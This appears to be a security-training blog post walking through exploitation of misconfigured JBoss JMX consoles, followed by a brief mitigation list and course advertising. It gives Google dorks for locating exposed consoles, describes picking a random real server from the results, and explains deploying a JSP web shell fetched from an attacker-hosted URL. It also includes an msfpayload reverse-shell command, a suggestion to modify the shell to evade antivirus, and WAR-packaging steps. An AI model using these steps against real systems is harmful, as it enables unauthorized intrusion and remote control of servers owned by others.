JBOSS Exploitation
JBoss Application Server is an open-source Java EE-based application server. JBoss is widely used and is deployed by many organizations on their web servers. There are various vulnerabilities and bugs have been found on JBoss, but today we will have a look at one of the most critical bug in the JBoss application that can be used widely.
If Jboss is not configured properly, it can allow attackers to perform various malicious activities. As the JMX console can be accessed remotely usually on port 8080, hackers and malicious users can deploy their own WAR (web archive) file or shells on the server using the DeploymentScanner function in the JBoss console.
FREE role-guided training plans
FREE role-guided training plans
There are few Google dorks for finding the jmx-console and some of them are
- intitle:"jboss management console" "application server" version inurl:"web-console"
- intitle:"JBoss Management Console – Server Information" "application server" inurl:"web-console" OR inurl:"jmx-console"
- inurl:jmx-console/HtmlAdaptor
Since Most of the JBoss server have default authentication to the jmx-console, there is no restriction to access the console and web management interfaces, which allow attackers to bypass authentication and gain administrative access
Now after searching for jmx-console in Google using one of the dork, we choose one of the random URL and we can access the jmx-console. At the same time, there are few servers which do ask for authentication like the image shown below,
Next step, we need a JSP Shell which can be found again in the internet.
To deploy the malicious file, we will use the DeploymentScanner in the jmx console by adding a new URL where our malicious file is uploaded and the addURL() command can be used to add a new URL with an application or shell and it will be fetch the application from specified URL.
The next step is to wait for the DeploymentScanner to deploy the file and then we will be able to access our shell. Before deploying the shell, we need to upload our shell to a site like for example http://www.malicious website.com/files/cmd.jsp. Next we need to deploy it by accessing the DeploymentScanner in the console. Once the URL is added, we will invoke the function.
In the above image, we have a button to invoke the function. Once finished, the application gives a message of successful operation. While using the JSP shells, it's better to use to metasploit JSP shells since they are more stable when compared to others. To create a jsp shell using metasploit, use the command
root@bt:~# msfpayload java/jsp_shell_reverse_tcp LHOST=192.168.1.1 LPORT=8080 R > infosec.jsp
This will generate a jsp shell which can be further modified in order to evade the Anti-virus. Once the shell is uploaded to the server, start the Metasploit multi handler by opening an msfconsole. Access the uploaded shell and you will see a new session in the msfconsole.
If you are planning to upload the jsp shells directly from the console, then you might sometime have to package the malicious jsp file to WAR file. The following instructions should be used to while doing this
-
Install the most recent Java SDK (may require reboot)
-
Copy the cmd.jsp to the working directory and make a sub directory named web-inf
-
Place the content below into the file WEB-INF/web.xml
<?xml
version="1.0″ ?>
<web-app
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://java.sun.com/xml/ns/j2ee
http://java.sun.com/xml/ns/j2ee/web-app_2_4.xsd"
version="2.4″>
<servlet>
<servlet-name>Command</servlet-name>
<jsp-file>/cmd.jsp</jsp-file>
</servlet>
</web-app>
-
In Windows, pack the files into a WAR with the following command,
"C:Program Files (x86)Javajdk1.6.0_26binjar.exe" cvf cmd.war WEB-INF cmd.jsp
-
You can also use this exploit by Kingcope in order to exploit the same.
Mitigation:
- Upgrade to the latest version of Jboss.
- To disable the JBoss JMX console and web-console by removing the two .war directory named jmx-console.war and web-console.war from the location $JBOSS_HOME/[server]/all/deploy and $JBOSS_HOME/[server]/default/deploy.
- Also secure the Apache Tomcat manager
Reference:
FREE role-guided training plans
FREE role-guided training plans
https://www.trustwave.com/downloads/spiderlabs/Trustwave-SpiderLabs-Abusing-Jboss-Papathanasiou.pdf
Enroll in an Ethical Hacking Boot Camp and earn two of the industry’s most respected certifications — guaranteed.
- CEH exam voucher
- PenTest+ exam voucher
- Exam Pass Guarantee
- Live online hacking training
In this Series
- JBOSS Exploitation
- The rise of ethical hacking: Protecting businesses in 2024
- How to crack a password: Demo and video walkthrough
- Inside Equifax's massive breach: Demo of the exploit
- Wi-Fi password hack: WPA and WPA2 examples and video walkthrough
- How to hack mobile communications via Unisoc baseband vulnerability
- How to build a hook syscall detector
- Top tools for password-spraying attacks in active directory networks
- NPK: Free tool to crack password hashes with AWS
- Tutorial: How to exfiltrate or execute files in compromised machines with DNS
- Top 19 tools for hardware hacking with Kali Linux
- 20 popular wireless hacking tools [updated 2021]
- 13 popular wireless hacking tools [updated 2021]
- Man-in-the-middle attack: Real-life example and video walkthrough [Updated 2021]
- Decrypting SSL/TLS traffic with Wireshark [updated 2021]
- Dumping a complete database using SQL injection [updated 2021]
- Hacking clients with WPAD (web proxy auto-discovery) protocol [updated 2021]
- Hacking communities in the deep web [updated 2021]
- How to hack Android devices using the StageFright vulnerability [updated 2021]
- Hashcat tutorial for beginners [updated 2021]
- How to hack a phone charger
- What is a side-channel attack?
- Copy-paste compromises
- Hacking Microsoft teams vulnerabilities: A step-by-step guide
- PDF file format: Basic structure [updated 2020]
- 10 most popular password cracking tools [updated 2020]
- Popular tools for brute-force attacks [updated for 2020]
- Top 7 cybersecurity books for ethical hackers in 2020
- How quickly can hackers find exposed data online? Faster than you think …
- Hacking the Tor network: Follow up [updated 2020]
- Podcast/webinar recap: What's new in ethical hacking?
- Ethical hacking: TCP/IP for hackers
- Ethical hacking: SNMP recon
- How hackers check to see if your website is hackable
- Ethical hacking: Stealthy network recon techniques
- Getting started in Red Teaming
- Ethical hacking: IoT hacking tools
- Ethical hacking: BYOD vulnerabilities
- Ethical hacking: Wireless hacking with Kismet
- Ethical hacking: How to hack a web server
- Ethical hacking: Top 6 techniques for attacking two-factor authentication
- Ethical hacking: Port interrogation tools and techniques
- Ethical hacking: Top 10 browser extensions for hacking
- Ethical hacking: Social engineering basics
- Ethical hacking: Breaking windows passwords
- Ethical hacking: Basic malware analysis tools
- Ethical hacking: How to crack long passwords
- Ethical hacking: Passive information gathering with Maltego
- Ethical hacking: Log tampering 101
- Ethical hacking: What is vulnerability identification?
- Ethical hacking: Breaking cryptography (for hackers)
Get certified and advance your career
- Exam Pass Guarantee
- Live instruction
- CompTIA, ISACA, (ISC)², Cisco, Microsoft and more!
